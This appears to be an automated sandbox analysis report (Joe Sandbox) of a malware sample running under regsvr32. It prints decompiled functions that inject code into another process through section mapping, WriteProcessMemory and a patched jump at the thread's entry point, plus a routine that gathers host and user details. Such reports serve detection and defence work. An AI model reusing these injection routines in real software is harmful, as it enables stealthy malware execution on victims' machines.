                                                                                                                                                                        • Opcode Fuzzy Hash: 70242a3cc234ed20180fc4216fdb852dcc73d96dbc909186fa67038a29e3e3ea
                                                                                                                                                                        • Instruction Fuzzy Hash: 62112532F0424DABCF20AF68E8495AD7FB9FF94310F228A59E81596245EF34C1608785
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 05B9D447 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                        			E05B9D447(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x5baf81c; // 0x5d5fbe8
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E05B9F0DE(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x5baf918; // 0x5d5f9f0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x5baf818; // 0x5d5f8b0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x5bace44; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x5baf818; // 0x5d5f8b0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E05B98C43( *0x5baf81c, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E05B98BF4( &_v36, 0x1ac4);
					_t119 =  *0x5baf81c; // 0x5d5fbe8
					_t155 =  *0x5baf830; // 0x5b90000
					_v36 = _t119;
					 *0x5baf830 = _v8;
					 *0x5baf81c = _t163;
					E05B98CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E05B9D3C6(_v16, _v8, _v44);
					_t124 = E05B9A43D("quatr");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x5baf830 = _t155;
						 *0x5baf81c = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































                                                                                                                                                                        0x05b9d44d
                                                                                                                                                                        0x05b9d453
                                                                                                                                                                        0x05b9d455
                                                                                                                                                                        0x05b9d459
                                                                                                                                                                        0x05b9d45b
                                                                                                                                                                        0x05b9d45e
                                                                                                                                                                        0x05b9d461
                                                                                                                                                                        0x05b9d464
                                                                                                                                                                        0x05b9d467
                                                                                                                                                                        0x05b9d46a
                                                                                                                                                                        0x05b9d475
                                                                                                                                                                        0x05b9d478
                                                                                                                                                                        0x05b9d47f
                                                                                                                                                                        0x05b9d47f
                                                                                                                                                                        0x05b9d484
                                                                                                                                                                        0x05b9d487
                                                                                                                                                                        0x05b9d489
                                                                                                                                                                        0x05b9d48c
                                                                                                                                                                        0x05b9d495
                                                                                                                                                                        0x05b9d68e
                                                                                                                                                                        0x05b9d68e
                                                                                                                                                                        0x05b9d691
                                                                                                                                                                        0x05b9d694
                                                                                                                                                                        0x05b9d699
                                                                                                                                                                        0x05b9d69f
                                                                                                                                                                        0x05b9d6a2
                                                                                                                                                                        0x05b9d6a2
                                                                                                                                                                        0x05b9d6a5
                                                                                                                                                                        0x05b9d6a9
                                                                                                                                                                        0x05b9d6ab
                                                                                                                                                                        0x05b9d6c0
                                                                                                                                                                        0x05b9d6c0
                                                                                                                                                                        0x05b9d6ca
                                                                                                                                                                        0x05b9d6d4
                                                                                                                                                                        0x05b9d6d4
                                                                                                                                                                        0x05b9d6db
                                                                                                                                                                        0x05b9d6db
                                                                                                                                                                        0x05b9d4a4
                                                                                                                                                                        0x05b9d4be
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d4c4
                                                                                                                                                                        0x05b9d4cc
                                                                                                                                                                        0x05b9d4d4
                                                                                                                                                                        0x05b9d4da
                                                                                                                                                                        0x05b9d4e1
                                                                                                                                                                        0x05b9d4e9
                                                                                                                                                                        0x05b9d4ea
                                                                                                                                                                        0x05b9d4f1
                                                                                                                                                                        0x05b9d4f4
                                                                                                                                                                        0x05b9d4f5
                                                                                                                                                                        0x05b9d4fc
                                                                                                                                                                        0x05b9d4ff
                                                                                                                                                                        0x05b9d506
                                                                                                                                                                        0x05b9d507
                                                                                                                                                                        0x05b9d50a
                                                                                                                                                                        0x05b9d516
                                                                                                                                                                        0x05b9d538
                                                                                                                                                                        0x05b9d540
                                                                                                                                                                        0x05b9d543
                                                                                                                                                                        0x05b9d54e
                                                                                                                                                                        0x05b9d54e
                                                                                                                                                                        0x05b9d540
                                                                                                                                                                        0x05b9d56a
                                                                                                                                                                        0x05b9d579
                                                                                                                                                                        0x05b9d57c
                                                                                                                                                                        0x05b9d581
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d5ab
                                                                                                                                                                        0x05b9d5bb
                                                                                                                                                                        0x05b9d5bd
                                                                                                                                                                        0x05b9d5c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d5d9
                                                                                                                                                                        0x05b9d5ec
                                                                                                                                                                        0x05b9d600
                                                                                                                                                                        0x05b9d60c
                                                                                                                                                                        0x05b9d611
                                                                                                                                                                        0x05b9d616
                                                                                                                                                                        0x05b9d61c
                                                                                                                                                                        0x05b9d622
                                                                                                                                                                        0x05b9d62a
                                                                                                                                                                        0x05b9d63a
                                                                                                                                                                        0x05b9d646
                                                                                                                                                                        0x05b9d650
                                                                                                                                                                        0x05b9d658
                                                                                                                                                                        0x05b9d65d
                                                                                                                                                                        0x05b9d660
                                                                                                                                                                        0x05b9d668
                                                                                                                                                                        0x05b9d668
                                                                                                                                                                        0x05b9d668
                                                                                                                                                                        0x05b9d66b
                                                                                                                                                                        0x05b9d66f
                                                                                                                                                                        0x05b9d670
                                                                                                                                                                        0x05b9d674
                                                                                                                                                                        0x05b9d678
                                                                                                                                                                        0x05b9d681
                                                                                                                                                                        0x05b9d687
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d687
                                                                                                                                                                        0x05b9d662
                                                                                                                                                                        0x05b9d666
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9d666

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateSection.NTDLL(05B9D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 05B9D4B9
                                                                                                                                                                        • RegisterClassExA.USER32(?), ref: 05B9D50D
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 05B9D538
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 05B9D543
                                                                                                                                                                        • UnregisterClassA.USER32 ref: 05B9D54E
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(05B9D982,00000000), ref: 05B9D579
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(05B9D982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05B9D5A0
                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 05B9D5E6
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 05B9D600
                                                                                                                                                                          • Part of subcall function 05B98BF4: HeapFree.KERNEL32(00000000,00000000), ref: 05B98C3A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,05B961C5), ref: 05B9D678
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000), ref: 05B9D6C0
                                                                                                                                                                        • NtClose.NTDLL(00000000), ref: 05B9D6D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                        • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                        • API String ID: 494031690-2640591812
                                                                                                                                                                        • Opcode ID: add008d9d9b071ef9e073df41449060b8f04419018a247fc7893307f3b7d55d4
                                                                                                                                                                        • Instruction ID: 71b465406206bf9b455189a6edafee9b217f474281b5d3dd0808c145dece2787
                                                                                                                                                                        • Opcode Fuzzy Hash: add008d9d9b071ef9e073df41449060b8f04419018a247fc7893307f3b7d55d4
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F810BB5A10219EFDB14DF95D886EEEBBB8FB08304F1441AAF505E7250DB70A941CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9D959 Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 142 5b9d959-5b9d972 call 5b9d218 145 5b9d978-5b9d986 call 5b9d447 142->145 146 5b9da4b-5b9da56 call 5b9d38b 142->146 145->146 151 5b9d98c-5b9d9c3 call 5b98d6d GetThreadContext 145->151 151->146 154 5b9d9c9-5b9da09 NtProtectVirtualMemory 151->154 155 5b9da49 154->155 156 5b9da0b-5b9da26 NtWriteVirtualMemory 154->156 155->146 156->155 157 5b9da28-5b9da47 NtProtectVirtualMemory 156->157 157->146 157->155
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9D959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E05B9D218(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E05B9D447( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E05B98D6D( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E05B9D38B();
				return _t66;
			}



















                                                                                                                                                                        0x05b9d965
                                                                                                                                                                        0x05b9d967
                                                                                                                                                                        0x05b9d969
                                                                                                                                                                        0x05b9d972
                                                                                                                                                                        0x05b9d97d
                                                                                                                                                                        0x05b9d982
                                                                                                                                                                        0x05b9d986
                                                                                                                                                                        0x05b9d99a
                                                                                                                                                                        0x05b9d9a2
                                                                                                                                                                        0x05b9d9c3
                                                                                                                                                                        0x05b9d9c9
                                                                                                                                                                        0x05b9d9d1
                                                                                                                                                                        0x05b9d9df
                                                                                                                                                                        0x05b9d9e5
                                                                                                                                                                        0x05b9d9e6
                                                                                                                                                                        0x05b9d9f2
                                                                                                                                                                        0x05b9d9f9
                                                                                                                                                                        0x05b9da09
                                                                                                                                                                        0x05b9da49
                                                                                                                                                                        0x05b9da49
                                                                                                                                                                        0x05b9da28
                                                                                                                                                                        0x05b9da28
                                                                                                                                                                        0x05b9da47
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9da47
                                                                                                                                                                        0x05b9da09
                                                                                                                                                                        0x05b9d9c3
                                                                                                                                                                        0x05b9d986
                                                                                                                                                                        0x05b9da4b
                                                                                                                                                                        0x05b9da56

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B9D218: LoadLibraryW.KERNEL32 ref: 05B9D312
                                                                                                                                                                          • Part of subcall function 05B9D447: NtCreateSection.NTDLL(05B9D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 05B9D4B9
                                                                                                                                                                          • Part of subcall function 05B9D447: RegisterClassExA.USER32(?), ref: 05B9D50D
                                                                                                                                                                          • Part of subcall function 05B9D447: CreateWindowExA.USER32 ref: 05B9D538
                                                                                                                                                                          • Part of subcall function 05B9D447: DestroyWindow.USER32(00000000), ref: 05B9D543
                                                                                                                                                                          • Part of subcall function 05B9D447: UnregisterClassA.USER32 ref: 05B9D54E
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 05B9D9BB
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05B9DA04
                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 05B9DA21
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 05B9DA42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1578692462-0
                                                                                                                                                                        • Opcode ID: e88e3484f6c27565cbf772028b4abb46bcb7c26efb3199b7f60c61a070a307b2
                                                                                                                                                                        • Instruction ID: e830dc77057876254e274a0c9fa24d45d14b400f712eac80eb93bd4ad64f3f8e
                                                                                                                                                                        • Opcode Fuzzy Hash: e88e3484f6c27565cbf772028b4abb46bcb7c26efb3199b7f60c61a070a307b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A315E76A0010AAFDB15DFA5DC89FEEBBBCEF44200F1041B6E605E3250E730EA558B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9DF3D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E05B9DF3D(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				char _v144;
				short _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				void** _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				long _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				WCHAR* _t195;
				long _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x5baf830; // 0x5b90000
				_t68 = E05B98BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x5baf818; // 0x5d5f8b0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E05BA3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x5baf818; // 0x5d5f8b0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E05B995F3(_t194, _t207);
					}
					_t75 =  *0x5baf818; // 0x5d5f8b0
					_t77 = E05B9C879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *(_t192 + 0x110) = _t77;
					_t159 =  *_t77;
					if(E05B9C9F4( *_t77) == 0) {
						_t79 = E05B9C8C9(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E05B9F3A3(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E05B9F368(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_v12 = 0x80;
					_v8 = 0x100;
					if(LookupAccountSidW(0,  *( *(_t192 + 0x110)), _t195,  &_v12,  &_v656,  &_v8,  &_v16) == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E05B9DF36(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E05B995F3(_t149, _t211);
					}
					_t92 = E05B9C6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E05B9C4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E05B999DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E05B9960D(_t149, _t36);
					_t97 = E05B9E2C5(_t196, E05B9A43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E05B9C6E4(_t97, _t37, _t216);
					_t99 =  *0x5baf818; // 0x5d5f8b0
					_t101 = E05B9CA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E05B98D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E05B9DD39(_t100);
					_t106 = E05B9DD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E05B99DF2(_t105, 0x9cf);
					_t177 =  *0x5baf818; // 0x5d5f8b0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x5baf818; // 0x5d5f8b0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E05B98BAF( &_v8);
					_t113 =  *0x5baf818; // 0x5d5f8b0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E05B99E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x5baf818; // 0x5d5f8b0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x5baf818; // 0x5d5f8b0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x5baf818; // 0x5d5f8b0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x5baf818; // 0x5d5f8b0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x5baf818; // 0x5d5f8b0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x5baf818; // 0x5d5f8b0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E05BA3548(E05B9E2C5(_t62, E05B9A43D(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E05BA351A( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E05B996DA(_t66, _t191);
					_t134 = E05B9DAE3(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}






















































                                                                                                                                                                        0x05b9df3d
                                                                                                                                                                        0x05b9df47
                                                                                                                                                                        0x05b9df53
                                                                                                                                                                        0x05b9df58
                                                                                                                                                                        0x05b9df5d
                                                                                                                                                                        0x05b9df6a
                                                                                                                                                                        0x05b9df70
                                                                                                                                                                        0x05b9df75
                                                                                                                                                                        0x05b9df7b
                                                                                                                                                                        0x05b9df8b
                                                                                                                                                                        0x05b9df90
                                                                                                                                                                        0x05b9df95
                                                                                                                                                                        0x05b9df95
                                                                                                                                                                        0x05b9dfa5
                                                                                                                                                                        0x05b9dfab
                                                                                                                                                                        0x05b9dfad
                                                                                                                                                                        0x05b9dfb6
                                                                                                                                                                        0x05b9dfb6
                                                                                                                                                                        0x05b9dfbc
                                                                                                                                                                        0x05b9dfc9
                                                                                                                                                                        0x05b9dfce
                                                                                                                                                                        0x05b9dfd4
                                                                                                                                                                        0x05b9dfdd
                                                                                                                                                                        0x05b9dfeb
                                                                                                                                                                        0x05b9dff2
                                                                                                                                                                        0x05b9dff7
                                                                                                                                                                        0x05b9dff7
                                                                                                                                                                        0x05b9dff8
                                                                                                                                                                        0x05b9dfdf
                                                                                                                                                                        0x05b9dfdf
                                                                                                                                                                        0x05b9dfdf
                                                                                                                                                                        0x05b9dffe
                                                                                                                                                                        0x05b9e004
                                                                                                                                                                        0x05b9e009
                                                                                                                                                                        0x05b9e00f
                                                                                                                                                                        0x05b9e014
                                                                                                                                                                        0x05b9e01a
                                                                                                                                                                        0x05b9e01a
                                                                                                                                                                        0x05b9e023
                                                                                                                                                                        0x05b9e02d
                                                                                                                                                                        0x05b9e03b
                                                                                                                                                                        0x05b9e05c
                                                                                                                                                                        0x05b9e05e
                                                                                                                                                                        0x05b9e05e
                                                                                                                                                                        0x05b9e06e
                                                                                                                                                                        0x05b9e073
                                                                                                                                                                        0x05b9e073
                                                                                                                                                                        0x05b9e080
                                                                                                                                                                        0x05b9e086
                                                                                                                                                                        0x05b9e08b
                                                                                                                                                                        0x05b9e08d
                                                                                                                                                                        0x05b9e096
                                                                                                                                                                        0x05b9e096
                                                                                                                                                                        0x05b9e09e
                                                                                                                                                                        0x05b9e0a3
                                                                                                                                                                        0x05b9e0a3
                                                                                                                                                                        0x05b9e0a9
                                                                                                                                                                        0x05b9e0b4
                                                                                                                                                                        0x05b9e0b9
                                                                                                                                                                        0x05b9e0c1
                                                                                                                                                                        0x05b9e0c7
                                                                                                                                                                        0x05b9e0cf
                                                                                                                                                                        0x05b9e0e1
                                                                                                                                                                        0x05b9e0e7
                                                                                                                                                                        0x05b9e0ef
                                                                                                                                                                        0x05b9e0f4
                                                                                                                                                                        0x05b9e101
                                                                                                                                                                        0x05b9e112
                                                                                                                                                                        0x05b9e118
                                                                                                                                                                        0x05b9e11d
                                                                                                                                                                        0x05b9e120
                                                                                                                                                                        0x05b9e123
                                                                                                                                                                        0x05b9e130
                                                                                                                                                                        0x05b9e136
                                                                                                                                                                        0x05b9e140
                                                                                                                                                                        0x05b9e140
                                                                                                                                                                        0x05b9e146
                                                                                                                                                                        0x05b9e14e
                                                                                                                                                                        0x05b9e159
                                                                                                                                                                        0x05b9e15e
                                                                                                                                                                        0x05b9e164
                                                                                                                                                                        0x05b9e166
                                                                                                                                                                        0x05b9e173
                                                                                                                                                                        0x05b9e174
                                                                                                                                                                        0x05b9e175
                                                                                                                                                                        0x05b9e180
                                                                                                                                                                        0x05b9e182
                                                                                                                                                                        0x05b9e189
                                                                                                                                                                        0x05b9e189
                                                                                                                                                                        0x05b9e193
                                                                                                                                                                        0x05b9e198
                                                                                                                                                                        0x05b9e19d
                                                                                                                                                                        0x05b9e19d
                                                                                                                                                                        0x05b9e1a3
                                                                                                                                                                        0x05b9e1aa
                                                                                                                                                                        0x05b9e1ab
                                                                                                                                                                        0x05b9e1b8
                                                                                                                                                                        0x05b9e1cb
                                                                                                                                                                        0x05b9e1d0
                                                                                                                                                                        0x05b9e1d5
                                                                                                                                                                        0x05b9e1de
                                                                                                                                                                        0x05b9e1de
                                                                                                                                                                        0x05b9e1e4
                                                                                                                                                                        0x05b9e1e9
                                                                                                                                                                        0x05b9e1ef
                                                                                                                                                                        0x05b9e1f5
                                                                                                                                                                        0x05b9e1fa
                                                                                                                                                                        0x05b9e203
                                                                                                                                                                        0x05b9e205
                                                                                                                                                                        0x05b9e20c
                                                                                                                                                                        0x05b9e20c
                                                                                                                                                                        0x05b9e212
                                                                                                                                                                        0x05b9e21a
                                                                                                                                                                        0x05b9e21f
                                                                                                                                                                        0x05b9e220
                                                                                                                                                                        0x05b9e225
                                                                                                                                                                        0x05b9e22e
                                                                                                                                                                        0x05b9e230
                                                                                                                                                                        0x05b9e23b
                                                                                                                                                                        0x05b9e23b
                                                                                                                                                                        0x05b9e244
                                                                                                                                                                        0x05b9e24c
                                                                                                                                                                        0x05b9e253
